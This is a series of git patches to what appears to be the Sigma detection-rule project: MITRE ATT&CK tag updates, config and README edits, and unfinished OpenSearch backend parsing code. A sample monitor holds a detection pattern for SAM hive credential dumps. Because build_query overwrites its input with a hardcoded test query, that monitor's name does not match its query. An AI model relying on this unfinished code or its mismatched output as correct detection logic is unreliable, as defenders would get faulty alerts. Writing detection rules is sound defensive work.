.bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +description: | + Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. + In it's default mode, it builds a self deleting .bat file which executes malicious command. + The detection rule relies on creation of the malicious bat file (debug.bat by default). +references: + - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: pbssubhash date: 2021/08/21 tags: From 645492cef56899253752216a909b6218bb6f8c25 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 21 Aug 2021 14:57:38 -0500 Subject: [PATCH 0492/1367] Update m365.yml just working on expanding this. --- tools/config/generic/m365.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml index 51e08af6..fb816bd1 100644 --- a/tools/config/generic/m365.yml +++ b/tools/config/generic/m365.yml @@ -5,3 +5,8 @@ ThreatManagement: category: ThreatManagement conditions: eventSource: SecurityComplianceCenter +AccessGovernance: + product: m365 + category: AccessGovernance + conditions: + eventSource: SecurityComplianceCenter From 579a80411de1ec3c01b222d42c5b3fa857edc50a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 21 Aug 2021 15:03:31 -0500 Subject: [PATCH 0493/1367] Update m365.yml --- tools/config/generic/m365.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml index fb816bd1..de769059 100644 --- a/tools/config/generic/m365.yml +++ b/tools/config/generic/m365.yml @@ -10,3 +10,23 @@ AccessGovernance: category: AccessGovernance conditions: eventSource: SecurityComplianceCenter +CloudDiscovery: + product: m365 + category: CloudDiscovery + conditions: + eventSource: SecurityComplianceCenter +DataLossPrevention: + product: m365 + category: DataLossPrevention + conditions: + eventSource: SecurityComplianceCenter +ThreatDetection: + product: m365 + category: ThreatDetection + conditions: + eventSource: SecurityComplianceCenter +SharingControl: + product: m365 + category: SharingControl + conditions: + eventSource: SecurityComplianceCenter From 6b66c0774cc8506c537771008ac225f75ae48db3 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 22 Aug 2021 10:10:12 +0530 Subject: [PATCH 0494/1367] Changing service to sysmon --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 702dcf29..bbb1219f 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -15,7 +15,7 @@ tags: - attack.defense_evasion - attack.t1574.001 logsource: - category: file_event + service: sysmon product: windows detection: selection: From 7cd71b224036583a214f440f1d7308f24be4283a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 22 Aug 2021 08:57:07 +0200 Subject: [PATCH 0495/1367] fix yaml error --- tools/sigma/sigma2attack.py | 38 +++++++++++++++++++------------------ 1 file changed, 20 insertions(+), 18 deletions(-) diff --git a/tools/sigma/sigma2attack.py b/tools/sigma/sigma2attack.py index 165d077f..2f6ceafc 100755 --- a/tools/sigma/sigma2attack.py +++ b/tools/sigma/sigma2attack.py @@ -8,6 +8,7 @@ import sys import yaml + def main(): parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("--rules-directory", "-d", dest="rules_dir", default="rules", help="Directory to read rules from") @@ -20,24 +21,25 @@ def main(): curr_max_technique_count = 0 num_rules_used = 0 for rule_file in rule_files: - try: - rule = yaml.safe_load(open(rule_file, encoding="utf-8").read()) - except yaml.YAMLError: - sys.stderr.write("Ignoring rule " + rule_file + " (parsing failed)\n") - continue - if "tags" not in rule: - sys.stderr.write("Ignoring rule " + rule_file + " (no tags)\n") - continue - tags = rule["tags"] - for tag in tags: - if tag.lower().startswith("attack.t"): - technique_id = tag[len("attack."):].upper() - num_rules_used += 1 - if technique_id not in techniques_to_rules: - techniques_to_rules[technique_id] = [] - techniques_to_rules[technique_id].append(os.path.basename(rule_file)) - curr_max_technique_count = max(curr_max_technique_count, len(techniques_to_rules[technique_id])) - + with open(rule_file,encoding='utf-8') as f: + docs = yaml.load_all(f, Loader=yaml.FullLoader) + double = False + for rule in docs: + if "tags" not in rule : + if double == False : # Only 1 warning + sys.stderr.write("Ignoring rule " + rule_file + " (no tags)\n") + double = True # action globle no tag + continue + tags = rule["tags"] + double = True + for tag in tags: + if tag.lower().startswith("attack.t"): + technique_id = tag[len("attack."):].upper() + num_rules_used += 1 + if technique_id not in techniques_to_rules: + techniques_to_rules[technique_id] = [] + techniques_to_rules[technique_id].append(os.path.basename(rule_file)) + curr_max_technique_count = max(curr_max_technique_count, len(techniques_to_rules[technique_id])) scores = [] for technique in techniques_to_rules: From 295054dcbe0a362d7eed143b8f37c2b5b47a2eb5 Mon Sep 17 00:00:00 2001 From: SomeOne Date: Sun, 22 Aug 2021 13:57:56 +0200 Subject: [PATCH 0496/1367] Replace old mitre techniques by new one --- rules/linux/lnx_security_tools_disabling.yml | 2 +- rules/linux/lnx_sudo_cve_2019_14287.yml | 3 ++- rules/network/zeek/zeek_dns_mining_pools.yml | 3 ++- rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml | 3 ++- rules/web/win_powershell_snapins_hafnium.yml | 4 ++-- rules/web/win_webshell_regeorg.yml | 2 +- .../win_arbitrary_shell_execution_via_settingcontent.yml | 3 ++- rules/windows/builtin/win_event_log_cleared.yml | 3 ++- rules/windows/malware/av_webshell.yml | 2 +- rules/windows/powershell/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell/powershell_remote_powershell_session.yml | 6 +++--- rules/windows/powershell/powershell_renamed_powershell.yml | 5 +++-- .../windows/process_access/sysmon_mimikatz_trough_winrm.yml | 6 +++--- .../win_bad_opsec_sacrificial_processes.yml | 2 +- .../win_credential_access_via_password_filter.yml | 3 ++- .../process_creation/win_lolbas_execution_of_wuauclt.yml | 5 +++-- .../win_modif_of_services_for_via_commandline.yml | 6 ++++-- .../process_creation/win_powershell_disable_windef_av.yml | 2 +- .../win_powershell_reverse_shell_connection.yml | 4 ++-- ...ticky_keys_unauthenticated_privileged_console_access.yml | 5 +++-- .../process_creation/win_susp_shell_spawn_from_mssql.yml | 3 ++- .../sysmon_registry_persistence_key_linking.yml | 3 ++- 22 files changed, 45 insertions(+), 32 deletions(-) diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index 8d1f1617..2fee4c8e 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -13,7 +13,7 @@ level: medium tags: - attack.defense_evasion - attack.t1562.004 - - attack.t1089 + - attack.t1089 # an old one --- logsource: category: process_creation diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index bbd9d785..84ab95b7 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -18,7 +18,8 @@ level: critical tags: - attack.privilege_escalation - attack.t1068 - - attack.t1169 + - attack.t1169 # an old one + - attack.t1548.003 --- detection: selection_keywords: diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 71003888..c43795db 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -10,7 +10,8 @@ logsource: service: dns product: zeek tags: - - attack.t1035 + - attack.t1035 # an old one + - attack.t1569.002 - attack.t1496 detection: selection: diff --git a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml index 85306e0a..1690856f 100644 --- a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml +++ b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml @@ -10,7 +10,8 @@ references: - 'https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS' author: '@neu5ron, SOC Prime Team, Corelight' tags: - - attack.t1094 + - attack.t1094 # an old one + - attack.t1095 - attack.t1043 - attack.command_and_control logsource: diff --git a/rules/web/win_powershell_snapins_hafnium.yml b/rules/web/win_powershell_snapins_hafnium.yml index 3c35f816..b51f2b83 100644 --- a/rules/web/win_powershell_snapins_hafnium.yml +++ b/rules/web/win_powershell_snapins_hafnium.yml @@ -10,8 +10,8 @@ date: 2021/03/03 modified: 2021/08/09 tags: - attack.execution - - attack.t1086 - - attack.t1059.005 + - attack.t1086 # an old one + - attack.t1059.001 - attack.collection - attack.t1114 logsource: diff --git a/rules/web/win_webshell_regeorg.yml b/rules/web/win_webshell_regeorg.yml index b4ccdb5c..2a2b89e4 100644 --- a/rules/web/win_webshell_regeorg.yml +++ b/rules/web/win_webshell_regeorg.yml @@ -33,5 +33,5 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1100 + - attack.t1100 # an old one - attack.t1505.003 diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index 659c0e75..fffa3a9e 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -8,7 +8,8 @@ references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 tags: - attack.t1204 - - attack.t1193 + - attack.t1193 # an old one + - attack.t1566.001 - attack.execution - attack.initial_access logsource: diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index e3a88f08..649d0d95 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -11,7 +11,8 @@ logsource: service: security product: windows tags: - - attack.t1107 + - attack.t1107 # an old one + - attack.t1070.001 detection: selection: EventID: 1102 diff --git a/rules/windows/malware/av_webshell.yml b/rules/windows/malware/av_webshell.yml index 3d9cc310..39960e1d 100644 --- a/rules/windows/malware/av_webshell.yml +++ b/rules/windows/malware/av_webshell.yml @@ -16,7 +16,7 @@ references: - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection tags: - attack.persistence - - attack.t1100 + - attack.t1100 # an old one - attack.t1505.003 logsource: product: antivirus diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml index 98ec3052..64bc41c2 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml @@ -12,7 +12,7 @@ modified: 2020/10/09 tags: - attack.execution - attack.t1059.001 - - attack.t1086 + - attack.t1086 # an old one logsource: product: windows service: powershell diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 237c546b..e8e29b1a 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -11,10 +11,10 @@ references: tags: - attack.execution - attack.t1059.001 - - attack.t1086 #an old one + - attack.t1086 # an old one - attack.lateral_movement - attack.t1021.006 - - attack.t1028 #an old one + - attack.t1028 # an old one falsepositives: - Legitimate use remote PowerShell sessions level: high @@ -39,4 +39,4 @@ detection: EventID: 400 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' - condition: selection \ No newline at end of file + condition: selection diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index 5b6304ef..d0d732e1 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -9,7 +9,8 @@ date: 2020/06/29 modified: 2021/08/18 tags: - attack.execution - - attack.t1086 + - attack.t1086 # an old one + - attack.t1059.001 logsource: product: windows service: powershell-classic @@ -25,4 +26,4 @@ detection: condition: selection and not filter falsepositives: - unknown -level: low \ No newline at end of file +level: low diff --git a/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml b/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml index c433c22d..cf5b00e4 100755 --- a/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml +++ b/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml @@ -19,12 +19,12 @@ tags: - attack.credential_access - attack.execution - attack.t1003.001 - - attack.t1003 #an old one + - attack.t1003 # an old one - attack.t1059.001 - - attack.t1086 #an old one + - attack.t1086 # an old one - attack.lateral_movement - attack.t1021.006 - - attack.t1028 #an old one + - attack.t1028 # an old one - attack.s0002 falsepositives: - low diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 4b9294d8..bce196ae 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -9,7 +9,7 @@ references: - https://www.cobaltstrike.com/help-opsec tags: - attack.defense_evasion - - attack.t1085 # legacy + - attack.t1085 # an old one - attack.t1218.011 logsource: category: process_creation diff --git a/rules/windows/process_creation/win_credential_access_via_password_filter.yml b/rules/windows/process_creation/win_credential_access_via_password_filter.yml index 2fda0365..c67033c1 100644 --- a/rules/windows/process_creation/win_credential_access_via_password_filter.yml +++ b/rules/windows/process_creation/win_credential_access_via_password_filter.yml @@ -10,7 +10,8 @@ references: - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter tags: - attack.credential_access - - attack.t1174 + - attack.t1174 # an old one + - attack.t1556.002 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml index c603644e..44705724 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml @@ -10,7 +10,8 @@ modified: 2021/06/11 tags: - attack.defense_evasion - attack.execution - - attack.t1085 + - attack.t1085 # an old one + - attack.t1218.011 logsource: product: windows category: process_creation @@ -26,4 +27,4 @@ falsepositives: - Wuaueng.dll which is a module belonging to Microsoft Windows Update. fields: - CommandLine -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 05ee03d5..7b146ad2 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -6,8 +6,10 @@ references: status: experimental tags: - attack.persistence - - attack.t1031 - - attack.t1058 + - attack.t1031 # an old one + - attack.t1543.003 + - attack.t1058 # an old one + - attack.t1574.011 author: Sreeman date: 2020/09/29 modified: 2021/08/10 diff --git a/rules/windows/process_creation/win_powershell_disable_windef_av.yml b/rules/windows/process_creation/win_powershell_disable_windef_av.yml index ebfb84ed..4d507255 100644 --- a/rules/windows/process_creation/win_powershell_disable_windef_av.yml +++ b/rules/windows/process_creation/win_powershell_disable_windef_av.yml @@ -11,7 +11,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md tags: - attack.defense_evasion - - attack.t1089 # legacy + - attack.t1089 # an old one - attack.t1562.001 logsource: category: process_creation diff --git a/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml b/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml index b044d26e..06cee06a 100644 --- a/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml +++ b/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml @@ -10,8 +10,8 @@ date: 2021/03/03 modified: 2021/06/27 tags: - attack.execution - - attack.t1086 - - attack.t1059.005 + - attack.t1086 # an old one + - attack.t1059.001 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml index 328318d1..715dfc75 100644 --- a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml +++ b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml @@ -9,7 +9,8 @@ date: 2020/18/02 modified: 2021/06/11 author: Sreeman tags: - - attack.t1015 + - attack.t1015 # an old one + - attack.t1546.008 - attack.privilege_escalation logsource: product: windows @@ -24,4 +25,4 @@ fields: - ParentProcess falsepositives: - Unknown -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml b/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml index 198851a1..11c66ddb 100644 --- a/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml +++ b/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml @@ -6,7 +6,8 @@ author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2021/06/27 tags: - - attack.t1100 + - attack.t1100 # an old one + - attack.t1505.003 - attack.t1190 - attack.initial_access - attack.persistence diff --git a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml index 2ede1d70..34447d11 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml @@ -9,7 +9,8 @@ date: 2019/10/23 modified: 2019/11/07 tags: - attack.persistence - - attack.t1122 + - attack.t1122 # an old one + - attack.t1546.015 logsource: category: registry_event product: windows From 9b30b487c3be60105202bd695ca90314e30f6495 Mon Sep 17 00:00:00 2001 From: Yugoslavskiy Daniil Date: Mon, 23 Aug 2021 04:25:29 +0200 Subject: [PATCH 0497/1367] add ATC to the Projects or Products that use Sigma section --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 864235a6..4815056d 100644 --- a/README.md +++ b/README.md @@ -318,6 +318,7 @@ These tools are not part of the main toolchain and maintained separately by thei # Projects or Products that use Sigma * [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (since version 2.4.70, March 2017) +* [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (since December 2018) * [SOC Prime - Sigma Rule Editor](https://tdm.socprime.com/sigma/) * [uncoder.io](https://uncoder.io/) - Online Translator for SIEM Searches * [THOR](https://www.nextron-systems.com/2018/06/28/spark-applies-sigma-rules-in-eventlog-scan/) - Scan with Sigma rules on endpoints From f51c46243906bbc62029343df9d2921586cb35df Mon Sep 17 00:00:00 2001 From: Young Date: Sun, 22 Aug 2021 21:58:04 -0700 Subject: [PATCH 0498/1367] finished building and translating AST, asupporting nested queries --- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 276 +++++++++++++++++++---------- tools/sigma/sigmac.py | 14 +- 3 files changed, 190 insertions(+), 102 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 04ff119a..f6839a71 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json @@ -1 +1 @@ -{"description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", "enabled": true, "false_positives": ["Software installation", "Software updates"], "filters": [], "from": "now-360s", "immutable": false, "index": ["winlogbeat-*"], "interval": "5m", "rule_id": "b0d77106-7bb0-41fe-bd94-d1752164d066", "language": "lucene", "output_index": ".siem-signals-default", "max_signals": 100, "risk_score": 5, "name": "Rare Schtasks Creations", "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")", "meta": {"from": "1m"}, "severity": "low", "tags": ["Execution", "Privilege Escalation", "Persistence", "T1053", "T1053.005"], "to": "now", "type": "threshold", "threat": [{"tactic": {"id": "TA0002", "reference": "https://attack.mitre.org/tactics/TA0002", "name": "Execution"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0004", "reference": "https://attack.mitre.org/tactics/TA0004", "name": "Privilege Escalation"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0003", "reference": "https://attack.mitre.org/tactics/TA0003", "name": "Persistence"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}], "version": 1, "threshold": {"field": "winlog.event_data.TaskName", "value": 6}} +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}, {"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 1e034800..73d3362f 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -40,58 +40,214 @@ class Atom: def __init__(self, field: str, prop: str) -> None: self.field = field self.prop = prop + def __str__(self) -> str: + return "Atom( {}, {} )".format(self.field.replace("\\\\", "\\"), self.prop.replace("\\\\", "\\")) +# Root of AST is always a Group class Group: - def __init__(self) -> None: - pass + def __init__(self) -> None: + pass + def __str__(self) -> str: + return "Group( {} )".format(str(self.ary).replace("\\\\", "\\")) class Boolean: def __init__(self, expression: Union[Atom, Group]) -> None: self.expression = expression + def __str__(self) -> str: + return "Boolean( {} )".format(str(self.expression).replace("\\\\", "\\")) class Ary: def __init__(self, bool1: Boolean, bool2: List[Tuple[str, Boolean]] = None) -> None: self.bool1 = bool1 self.bool2 = bool2 + def __str__(self) -> str: + return "Ary( {}, {} )".format(str(self.bool1).replace("\\\\", "\\"), [(rel, str(boolean).replace("\\\\", "\\")) for rel, boolean in self.bool2]) -def group_init(self, ary:Ary): +def group_init(self, ary: Ary): self.ary = ary Group.__init__ = group_init -def parseAtom(s: str) -> Atom: - return Atom(s.split(":")[0], s.split(":")[0]) +def parse_atom(s: str) -> Atom: + reg = r"(? Group: - return Group(parseAry(s[1:-1])) +# Since root of AST is always a Group, call parse_group to initiate parsing of overall expression +def parse_group(s: str) -> Group: + return Group(parse_ary(s[1:-1])) -def expandGroup(s: str) -> str: - field = s.strip("()").split(":")[0] - props = s.strip("()").split(":")[1].strip("()").split() - print(props) +def expand_group(s: str) -> str: + reg = r"(? Boolean: - if not s.contains("("): - expression = parseAtom(s) +def parse_boolean(s: str) -> Boolean: + if "(" not in s: + expression = parse_atom(s) else: if s[0] != '(': - s = expandGroup(s) - expression = parseGroup(s) + s = expand_group(s) + expression = parse_group(s) return Boolean(expression) -def parseAry(s: str) -> Ary: - pass +def parse_ary(s: str) -> Ary: + lst = [] + left = right = level = 0 + + while left < len(s): + # Going down one level + if right < len(s) and s[right] == '(': + level += 1 + + # Going up one level + elif right < len(s) and s[right] == ')': + level -= 1 + + # s[left:right] is parse-able + elif right == len(s) or (s[right] == ' ' and level == 0): + section = s[left:right] + + # Handle Boolean case + if section not in ["AND", "OR"]: + section = parse_boolean(section) + + lst.append(section) + left = right + 1 + + right += 1 + + # [Bool, Rel, Bool, Rel, Bool,...] => Bool, [(Rel, Bool), (Rel, Bool),...] + bool1 = lst[0] + bool2 = [] + + for i in range(1, len(lst), 2): + tupe = (lst[i], lst[i + 1]) + bool2.append(tupe) + + return Ary(bool1, bool2) + +def translate_atom(atom: Atom) -> dict: + return { + "match": { + atom.field: atom.prop + } + } + +def translate_group(group: Group) -> dict: + return translate_ary(group.ary) + +def translate_boolean(boolean: Boolean) -> dict: + if type(boolean.expression) is Atom: + return translate_atom(boolean.expression) + + return translate_group(boolean.expression) + +# Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs +def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> List[List[Boolean]]: + result = [[bool1]] + resultIndex = 0 + + for rel, boolean in boolArr: + if rel == "AND": + if resultIndex == len(result): + result.append([boolean]) + else: + result[resultIndex].append(boolean) + else: + resultIndex += 2 + result.append([boolean]) + + return result + +def adjust_matches(matches: List[dict]) -> List[dict]: + for index in range(len(matches)): + match = matches[index] + if "match" in match.keys(): + matches[index] = { + "bool": { + "must": [match] + } + } + return matches + +def contains_group(booleanArr: List[Boolean]) -> bool: + for boolean in booleanArr: + if type(boolean.expression) is Group: + return True + + return False + +def translate_ary(ary: Ary) -> dict: + parsedTranslation = convert_bool_array(ary.bool1, ary.bool2) + # print(f'ParsedTranslation: {parsedTranslation}') + + clauses = [] + + translateIndex = 0 + while translateIndex < len(parsedTranslation): + parsedExpression = parsedTranslation[translateIndex] + currMatches = [] + clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements + + # Statement was joined by "or" + if len(parsedExpression) == 1: + counter = 1 + tempIndex = translateIndex + while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1]) == 1: + tempIndex += 1 + counter += 1 + + # If there's more than one, use "should" clase instead of "must" + if counter > 1: + clause = "should" + parsedExpression = [] + + # Rebuild parsed expression to join statements together and fast forward the translate index + for i in range(counter): + parsedExpression += parsedTranslation[translateIndex+i] + + translateIndex = tempIndex + + # Iterate through each statement and join match statements into array + for boolean in parsedExpression: + # print(f'Boolean: {boolean}\nCurrMatches: {currMatches}\n') + currMatches.append(translate_boolean(boolean)) + + if contains_group(parsedExpression): + print(f"\nContains Group; currMatches: {currMatches}\n") + currMatches = adjust_matches(currMatches) + + currQuery = { + "bool": { + clause: currMatches + } + } + + # print(f'\nCurrQuery: {currQuery}') + + clauses.append(currQuery) + translateIndex += 1 + + # If only one type of clause, don't use nested bool object + if len(clauses) > 1: + return { + "bool": { + "should": clauses + } + } + return clauses[0] class OpenSearchBackend(object): """OpenSearch detection rule backend.""" @@ -229,80 +385,12 @@ class OpenSearchBackend(object): ''' def build_query(self, translation): # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)" - # translation = "(winlog.channel:\"System\"" - parsedTranslation = translation.strip("()").split("OR") + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # translation = '(winlog.event_id:"5156" AND (winlog.event_data.SourcePort:"3389" AND winlog.event_data.DestAddress.keyword:(127.* OR \:\:1)))' - print(f'\nExpanded group: {expandGroup("winlog.event_data.DestAddress.keyword:(127.* OR 121)")}\n') - - if len(parsedTranslation) == 0: - return {} - - clauses = [] - - translateIndex = 0 - while translateIndex < len(parsedTranslation): - expression = parsedTranslation[translateIndex] - currMatches = [] - clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements - - parsedExpression = expression.split() - - # Statement was joined by "or" - if len(parsedExpression) == 1: - counter = 1 - tempIndex = translateIndex - while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1].split()) == 1: - tempIndex += 1 - counter += 1 - - # If there's more than one, use "should" clase instead of "must" - if counter > 1: - clause = "should" - parsedExpression = [] - - # Rebuild parsed expression to join statements together and fast forward the translate index - for i in range(counter): - parsedExpression.append(parsedTranslation[translateIndex+i]) - parsedExpression.append(None) - - translateIndex = tempIndex - - # Iterate through each statement and join match statements into array - for expressionIndex in range(0, len(parsedExpression), 2): - element = parsedExpression[expressionIndex] - currMatches.append({ - "match": { - element.split(":")[0]: element.split(":")[1] - } - }) - - currQuery = { - "bool": { - clause: currMatches - } - } - - clauses.append(currQuery) - translateIndex += 1 - - # If only one type of clause, don't use nested bool object - if len(clauses) > 1: - if self.isThreshold: - self.isThreshold = False - return { - "bool": { - "should": clauses, - "filter": self.rule_threshold - } - } - else: - return { - "bool": { - "should": clauses - } - } - return clauses[0] + ast = parse_group(translation) + print("\nAST: " + 